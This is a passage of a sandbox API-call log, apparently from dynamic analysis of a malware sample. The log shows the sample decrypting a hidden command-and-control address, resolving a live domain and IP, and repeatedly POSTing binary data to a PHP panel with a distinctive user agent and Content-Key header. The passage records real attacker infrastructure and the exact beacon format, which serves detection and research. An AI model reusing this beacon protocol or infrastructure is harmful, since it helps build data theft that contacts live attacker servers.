lpThreadId=0x19ff08*=0x1020) returned 0x280 [0294.699] Sleep (dwMilliseconds=0xea60) [0294.700] GetProcessHeap () returned 0x740000 [0294.700] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763c98 [0294.701] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0294.702] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0294.709] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0294.709] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d7e8) returned 1 [0294.719] GetProcessHeap () returned 0x740000 [0294.719] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758688 [0294.720] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0294.720] CryptImportKey (in: hProv=0x75d7e8, pbData=0x758688, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d368) returned 1 [0294.721] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0294.722] CryptSetKeyParam (hKey=0x74d368, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0294.722] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0294.723] CryptSetKeyParam (hKey=0x74d368, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0294.723] GetProcessHeap () returned 0x740000 [0294.723] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758688 | out: hHeap=0x740000) returned 1 [0294.825] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0294.826] CryptDecrypt (in: hKey=0x74d368, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763c98, pdwDataLen=0x19fcfc | out: pbData=0x763c98, pdwDataLen=0x19fcfc) returned 1 [0294.827] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0294.827] CryptDestroyKey (hKey=0x74d368) returned 1 [0294.828] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0294.828] CryptReleaseContext (hProv=0x75d7e8, dwFlags=0x0) returned 1 [0295.153] GetProcessHeap () returned 0x740000 [0295.153] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x767278 [0295.154] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0295.154] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0295.155] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0295.155] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0295.156] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0295.156] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0295.157] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0295.157] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0295.157] GetProcessHeap () returned 0x740000 [0295.158] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75c020 [0295.158] getaddrinfo (in: pNodeName="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0295.158] GetProcessHeap () returned 0x740000 [0295.158] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c020 | out: hHeap=0x740000) returned 1 [0295.158] GetProcessHeap () returned 0x740000 [0295.159] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767278 | out: hHeap=0x740000) returned 1 [0295.159] GetProcessHeap () returned 0x740000 [0295.159] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763c98 | out: hHeap=0x740000) returned 1 [0295.159] GetProcessHeap () returned 0x740000 [0295.159] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763b78 [0295.161] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0295.161] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0295.280] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0295.282] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d540) returned 1 [0295.292] GetProcessHeap () returned 0x740000 [0295.292] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758778 [0295.293] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0295.293] CryptImportKey (in: hProv=0x75d540, pbData=0x758778, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d3a8) returned 1 [0295.294] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0295.295] CryptSetKeyParam (hKey=0x74d3a8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0295.295] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0295.296] CryptSetKeyParam (hKey=0x74d3a8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0295.296] GetProcessHeap () returned 0x740000 [0295.296] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758778 | out: hHeap=0x740000) returned 1 [0295.297] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0295.298] CryptDecrypt (in: hKey=0x74d3a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763b78, pdwDataLen=0x19fcfc | out: pbData=0x763b78, pdwDataLen=0x19fcfc) returned 1 [0295.299] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0295.299] CryptDestroyKey (hKey=0x74d3a8) returned 1 [0295.300] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0295.301] CryptReleaseContext (hProv=0x75d540, dwFlags=0x0) returned 1 [0295.301] GetProcessHeap () returned 0x740000 [0295.301] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x766360 [0295.302] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0295.302] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="http://") returned 0x0 [0295.303] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0295.303] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="https://") returned 0x0 [0295.304] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0295.305] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="/") returned="//bobby/five/fre.php" [0295.305] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0295.306] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch=":") returned 0x0 [0295.306] GetProcessHeap () returned 0x740000 [0295.306] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bf80 [0295.306] getaddrinfo (in: pNodeName="asiaoil.bar", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x75bfd0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c3b8*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75c0e8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) returned 0 [0295.456] GetProcessHeap () returned 0x740000 [0295.456] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b630 [0295.456] socket (af=2, type=1, protocol=6) returned 0x284 [0295.456] connect (s=0x284, name=0x75c3b8*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), namelen=16) returned 0 [0295.478] FreeAddrInfoW (pAddrInfo=0x75bfd0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c3b8*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75c0e8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) [0295.478] GetProcessHeap () returned 0x740000 [0295.478] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7d) returned 0x75d760 [0295.478] GetProcessHeap () returned 0x740000 [0295.478] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x201b) returned 0x767650 [0295.479] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0295.480] wvsprintfA (in: param_1=0x767650, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 178 [0295.480] GetProcessHeap () returned 0x740000 [0295.480] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x7562c0 [0295.480] GetProcessHeap () returned 0x740000 [0295.481] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0295.481] GetProcessHeap () returned 0x740000 [0295.481] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e) returned 0x763a10 [0295.481] GetProcessHeap () returned 0x740000 [0295.481] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1fdc) returned 0x767650 [0295.481] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0295.482] wvsprintfA (in: param_1=0x767650, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 579BFA72\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 243 [0295.482] GetProcessHeap () returned 0x740000 [0295.482] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xf5) returned 0x747868 [0295.483] GetProcessHeap () returned 0x740000 [0295.483] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0295.483] send (s=0x284, buf=0x747868*, len=243, flags=0) returned 243 [0295.484] send (s=0x284, buf=0x761fd0*, len=159, flags=0) returned 159 [0295.484] GetProcessHeap () returned 0x740000 [0295.484] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xfd0) returned 0x75da80 [0295.484] recv (in: s=0x284, buf=0x75da80, len=4048, flags=0 | out: buf=0x75da80*) returned 565 [0295.594] GetProcessHeap () returned 0x740000 [0295.595] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747868 | out: hHeap=0x740000) returned 1 [0295.595] GetProcessHeap () returned 0x740000 [0295.595] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763a10 | out: hHeap=0x740000) returned 1 [0295.595] GetProcessHeap () returned 0x740000 [0295.596] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7562c0 | out: hHeap=0x740000) returned 1 [0295.596] GetProcessHeap () returned 0x740000 [0295.596] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75d760 | out: hHeap=0x740000) returned 1 [0295.596] closesocket (s=0x284) returned 0 [0295.597] GetProcessHeap () returned 0x740000 [0295.597] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b630 | out: hHeap=0x740000) returned 1 [0295.597] GetProcessHeap () returned 0x740000 [0295.597] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x766360 | out: hHeap=0x740000) returned 1 [0295.598] GetProcessHeap () returned 0x740000 [0295.598] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763b78 | out: hHeap=0x740000) returned 1 [0295.598] GetProcessHeap () returned 0x740000 [0295.598] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bf80 | out: hHeap=0x740000) returned 1 [0295.598] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x75da80, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1024) returned 0x284 [0295.600] Sleep (dwMilliseconds=0xea60) [0295.722] GetProcessHeap () returned 0x740000 [0295.722] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763ed8 [0295.723] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0295.723] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0295.729] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0295.729] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d210) returned 1 [0295.736] GetProcessHeap () returned 0x740000 [0295.736] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758688 [0295.737] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0295.738] CryptImportKey (in: hProv=0x75d210, pbData=0x758688, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d9e8) returned 1 [0295.738] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0295.739] CryptSetKeyParam (hKey=0x74d9e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0295.740] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0295.740] CryptSetKeyParam (hKey=0x74d9e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0295.740] GetProcessHeap () returned 0x740000 [0295.741] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758688 | out: hHeap=0x740000) returned 1 [0295.742] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0295.742] CryptDecrypt (in: hKey=0x74d9e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763ed8, pdwDataLen=0x19fcfc | out: pbData=0x763ed8, pdwDataLen=0x19fcfc) returned 1 [0295.743] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0295.743] CryptDestroyKey (hKey=0x74d9e8) returned 1 [0295.745] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0295.745] CryptReleaseContext (hProv=0x75d210, dwFlags=0x0) returned 1 [0295.745] GetProcessHeap () returned 0x740000 [0295.745] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x765f10 [0295.976] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0295.976] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0295.977] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0295.977] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0295.978] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0295.978] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0295.979] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0295.980] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0295.980] GetProcessHeap () returned 0x740000 [0295.980] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bf30 [0295.980] getaddrinfo (in: pNodeName="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0295.980] GetProcessHeap () returned 0x740000 [0295.981] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bf30 | out: hHeap=0x740000) returned 1 [0295.981] GetProcessHeap () returned 0x740000 [0295.981] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x765f10 | out: hHeap=0x740000) returned 1 [0295.981] GetProcessHeap () returned 0x740000 [0295.981] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763ed8 | out: hHeap=0x740000) returned 1 [0295.981] GetProcessHeap () returned 0x740000 [0295.981] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763668 [0295.982] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0295.982] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0295.988] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0295.989] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d8f8) returned 1 [0296.133] GetProcessHeap () returned 0x740000 [0296.133] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758688 [0296.134] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0296.135] CryptImportKey (in: hProv=0x75d8f8, pbData=0x758688, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d9e8) returned 1 [0296.136] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0296.136] CryptSetKeyParam (hKey=0x74d9e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0296.137] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0296.137] CryptSetKeyParam (hKey=0x74d9e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0296.137] GetProcessHeap () returned 0x740000 [0296.138] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758688 | out: hHeap=0x740000) returned 1 [0296.138] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0296.139] CryptDecrypt (in: hKey=0x74d9e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763668, pdwDataLen=0x19fcfc | out: pbData=0x763668, pdwDataLen=0x19fcfc) returned 1 [0296.140] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0296.140] CryptDestroyKey (hKey=0x74d9e8) returned 1 [0296.141] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0296.141] CryptReleaseContext (hProv=0x75d8f8, dwFlags=0x0) returned 1 [0296.141] GetProcessHeap () returned 0x740000 [0296.141] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x766588 [0296.142] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0296.142] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="http://") returned 0x0 [0296.143] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0296.143] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="https://") returned 0x0 [0296.144] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0296.145] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="/") returned="//bobby/five/fre.php" [0296.145] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0296.146] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch=":") returned 0x0 [0296.146] GetProcessHeap () returned 0x740000 [0296.146] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bdc8 [0296.146] getaddrinfo (in: pNodeName="asiaoil.bar", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x75bf30*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c238*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75c0c0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c490*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) returned 0 [0296.147] GetProcessHeap () returned 0x740000 [0296.147] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b520 [0296.148] socket (af=2, type=1, protocol=6) returned 0x288 [0296.148] connect (s=0x288, name=0x75c238*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), namelen=16) returned 0 [0296.257] FreeAddrInfoW (pAddrInfo=0x75bf30*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c238*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75c0c0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c490*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) [0296.257] GetProcessHeap () returned 0x740000 [0296.257] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7d) returned 0x75cd48 [0296.257] GetProcessHeap () returned 0x740000 [0296.257] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x201b) returned 0x767650 [0296.258] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0296.258] wvsprintfA (in: param_1=0x767650, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 178 [0296.258] GetProcessHeap () returned 0x740000 [0296.258] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x7562c0 [0296.258] GetProcessHeap () returned 0x740000 [0296.259] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0296.259] GetProcessHeap () returned 0x740000 [0296.259] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e) returned 0x763aa0 [0296.259] GetProcessHeap () returned 0x740000 [0296.259] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1fdc) returned 0x767650 [0296.260] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0296.261] wvsprintfA (in: param_1=0x767650, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 579BFA72\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 243 [0296.261] GetProcessHeap () returned 0x740000 [0296.261] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xf5) returned 0x747868 [0296.261] GetProcessHeap () returned 0x740000 [0296.261] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0296.263] send (s=0x288, buf=0x747868*, len=243, flags=0) returned 243 [0296.264] send (s=0x288, buf=0x761fd0*, len=159, flags=0) returned 159 [0296.264] GetProcessHeap () returned 0x740000 [0296.264] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xfd0) returned 0x75da80 [0296.264] recv (in: s=0x288, buf=0x75da80, len=4048, flags=0 | out: buf=0x75da80*) returned 569 [0296.377] GetProcessHeap () returned 0x740000 [0296.378] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747868 | out: hHeap=0x740000) returned 1 [0296.378] GetProcessHeap () returned 0x740000 [0296.378] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763aa0 | out: hHeap=0x740000) returned 1 [0296.378] GetProcessHeap () returned 0x740000 [0296.378] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7562c0 | out: hHeap=0x740000) returned 1 [0296.378] GetProcessHeap () returned 0x740000 [0296.379] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75cd48 | out: hHeap=0x740000) returned 1 [0296.379] closesocket (s=0x288) returned 0 [0296.380] GetProcessHeap () returned 0x740000 [0296.380] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b520 | out: hHeap=0x740000) returned 1 [0296.380] GetProcessHeap () returned 0x740000 [0296.380] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x766588 | out: hHeap=0x740000) returned 1 [0296.380] GetProcessHeap () returned 0x740000 [0296.381] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763668 | out: hHeap=0x740000) returned 1 [0296.381] GetProcessHeap () returned 0x740000 [0296.381] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdc8 | out: hHeap=0x740000) returned 1 [0296.382] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x75da80, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1028) returned 0x288 [0296.385] Sleep (dwMilliseconds=0xea60) [0296.386] GetProcessHeap () returned 0x740000 [0296.387] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763b30 [0296.387] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0296.388] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0296.394] LoadLibraryW (lpLibFileName="ADVAPI32") returned 